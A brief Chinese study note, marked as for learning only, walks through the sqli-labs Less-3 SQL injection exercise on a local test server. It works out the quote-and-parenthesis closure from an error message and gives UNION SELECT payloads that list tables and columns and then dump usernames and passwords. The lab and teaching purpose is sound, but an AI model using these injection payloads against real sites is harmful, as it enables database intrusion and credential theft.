本文爲學習筆記,僅限學習交流
不得利用、從事危害國家或人民安全、榮譽和利益等活動
http://127.0.0.1/sqli/Less-3/?id=1
輸入?Id=1’後報錯
根據報錯信息“1”)
去掉前後兩個單引號,和自己輸入的一個單引號後還有兩個單引號和一個括號,可推出sql注入中的由單引號和括號的閉合模式。
order by 3 查看顯示位
(3)並不是固定的,要去試的
union select 查詢顯示位
聯合查詢語句:Union select 1,database(),version() 查詢當前數據庫名及版本號
union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
聯合查詢,爆出數據庫下的表名
union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’
查詢users 表裏的字段
union select 1,group_concat(username),group_concat(password) from security.users
爆出用戶,密碼
